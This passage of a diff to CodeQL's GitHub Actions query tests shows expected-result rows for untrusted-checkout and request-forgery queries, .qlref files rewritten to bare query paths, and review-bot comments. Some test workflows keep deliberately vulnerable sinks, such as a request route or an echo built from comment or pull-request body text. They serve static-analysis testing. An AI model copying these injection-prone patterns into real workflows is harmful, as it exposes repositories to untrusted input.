execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | -| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | -| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | -| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | -| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | edges | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | 
@@ -377,3 +337,43 @@ edges | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | | .github/workflows/workflow_run_untrusted_checkout_3.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout_3.yml:16:9:18:31 | Uses Step | +#select +| .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | pull_request_target | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/level0.yml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | pull_request_target | +| .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:60:6 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:60:9:60:37 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:47:7:51:46 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout.yml:15:9:18:2 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). 
| .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:23:9:26:6 | Uses Step | .github/workflows/untrusted_checkout.yml:30:9:32:23 | Run Step | Checkout of untrusted code in a privileged workflow with later potential execution (event trigger: $@). | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | pull_request_target |
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
index 667c7a786389..9f17733e16e8 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.qlref
@@ -1,2 +1 @@
-query: Security/CWE-829/UntrustedCheckoutCritical.ql
-postprocess: utils/test/InlineExpectationsTestQuery.ql
+Security/CWE-829/UntrustedCheckoutCritical.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref
index 84af7bdc7237..66b3f2cd9bf2 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutHigh.qlref
@@ -1,2 +1 @@
-query: Security/CWE-829/UntrustedCheckoutHigh.ql
-postprocess: utils/test/InlineExpectationsTestQuery.ql
+Security/CWE-829/UntrustedCheckoutHigh.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref
index 1cb2407ccc7a..55bb194f5ecd 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.qlref
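Review bot: UntrustedCheckoutCritical.qlref now names only the query, so with `postprocess: utils/test/InlineExpectationsTestQuery.ql` gone the alerts this CWE-829 test must produce are pinned solely by the `#select` rows of the `.expected` snapshot. A regression that drops or moves an alert then shows up only as a snapshot diff, which is easy to re-accept without reading. The UntrustedCheckoutHigh, UntrustedCheckoutMedium, UnversionedImmutableAction, RequestForgery, SyntaxError and UnnecessaryUseOfAdvancedConfig `.qlref` hunks make the same change. If moving away from inline expectations is deliberate, the patch description should state the reason; if it is not, the two-line form `query: Security/CWE-829/UntrustedCheckoutCritical.ql` plus the `postprocess:` line should stay.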
@@ -1,2 +1 @@
-query: Security/CWE-829/UntrustedCheckoutMedium.ql
-postprocess: utils/test/InlineExpectationsTestQuery.ql
+Security/CWE-829/UntrustedCheckoutMedium.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref
index e3d739264b2c..1887390c0f3d 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.qlref
@@ -1,2 +1 @@
-query: experimental/Security/CWE-829/UnversionedImmutableAction.ql
-postprocess: utils/test/InlineExpectationsTestQuery.ql
+experimental/Security/CWE-829/UnversionedImmutableAction.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
index 849f1cdf8ec4..6937467453b2 100644
--- a/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
+++ b/actions/ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml
@@ -6,5 +6,5 @@ jobs: steps: - uses: octokit/request-action@v2 with: - route: ${{ github.event.comment.body }} # $ Alert + route: ${{ github.event.comment.body }}
diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
index 5387cf2ebabb..d980139bb357 100644
--- a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
+++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.expected
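Review bot: After this hunk the fixture line `route: ${{ github.event.comment.body }}` in CWE-918/.github/workflows/test.yml carries no indication that it is the sink the test exists to catch; the only remaining link is the `test.yml:9:19:9:50` location in RequestForgery.expected. A trailing plain comment keeps that visible without moving the pinned line and column, for example `route: ${{ github.event.comment.body }} # comment body is user-controlled; RequestForgery.ql must flag this`. The malformed.yml and defaultable_workflow.yml hunks drop their `# $ Alert` markers in the same way and would benefit from an equivalent comment. The workflow's earlier lines, including its trigger, are outside the hunk.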
@@ -1,6 +1,6 @@ -#select -| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | edges nodes | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths +#select +| .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | Potential request forgery in $@, which may be controlled by an external user. | .github/workflows/test.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} |
diff --git a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
index 46eea075c3c3..5479b022be0f 100644
--- a/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-918/RequestForgery.qlref
@@ -1,2 +1 @@
-query: experimental/Security/CWE-918/RequestForgery.ql
-postprocess: utils/test/InlineExpectationsTestQuery.ql
+experimental/Security/CWE-918/RequestForgery.ql
diff --git a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
index 60f4b010f6d1..a8bfa4ae19a2 100644
--- a/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
+++ b/actions/ql/test/query-tests/SyntaxError/.github/workflows/malformed.yml
@@ -4,4 +4,4 @@ jobs: test: runs-on: ubuntu-latest steps: - - run: echo ${{ github.event.pull_request.body}} # $ Alert + - run: echo ${{ github.event.pull_request.body}}
diff --git a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref index f2bd2df19cbb..97c5686103cf 100644 --- a/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref +++ b/actions/ql/test/query-tests/SyntaxError/SyntaxError.qlref @@ -1,2 +1 @@ -query: Debug/SyntaxError.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Debug/SyntaxError.ql diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml index 301de120d6f9..31f43d8b8b29 100644 --- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/defaultable_workflow.yml @@ -52,7 +52,7 @@ jobs: # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). # If this step fails, then you should remove it and run the build manually (see below) - - name: Autobuild # $ Alert + - name: Autobuild uses: github/codeql-action/autobuild@v3 # â„¹ï¸ Command-line programs to run using the OS shell. diff --git a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref index 1cdc74dec251..75a8fe2398a6 100644 --- a/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref +++ b/actions/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref @@ -1,2 +1 @@ -query: Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql \ No newline at end of file 
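Review bot: The rewritten UnnecessaryUseOfAdvancedConfig.qlref ends without a final newline: the added line `Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql` is followed by `\ No newline at end of file`, while the other `.qlref` files rewritten in this patch keep theirs. Terminate that line with a newline so the file matches its siblings and a later one-line edit does not show up as a two-line diff.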
diff --git a/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/old.dbscheme b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/old.dbscheme
new file mode 100644
index 000000000000..0853f43dc8c0
--- /dev/null
+++ b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/old.dbscheme
